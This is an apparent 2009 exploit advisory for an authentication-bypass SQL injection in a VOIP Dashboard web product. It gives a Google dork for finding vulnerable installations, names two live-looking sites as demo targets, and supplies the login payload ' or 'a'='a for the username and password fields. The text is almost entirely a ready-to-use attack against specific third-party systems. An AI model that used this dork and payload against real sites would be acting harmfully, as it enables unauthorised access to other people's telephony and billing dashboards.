---------------------------------------------------------------------------------------------

[+] VOIP Dashboard (Auth Bypass)SQL Injection vulnerability
[+] Found By: Rohit Bansal [ SCHAP Security http://schap.org ]
[+] Date: 02-06-2009

----------------------------------------------------------------------------------------------------------------------------

Google Dork :

"
Download Dialer · International Rates · End User DashboardCDR DashboardAgent
Dashboard."



Demo:

http://cdr.anncalls.com/
http://cdr.extreme2calls.com/

User Name : ' or 'a'='a
Password : ' or 'a'='a


--------------------------------------------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec, Evilfinger
-------------------------------------------------------------------------------------------------------------------------



-- 
"You only get smarter, by playing a smarter opponent !"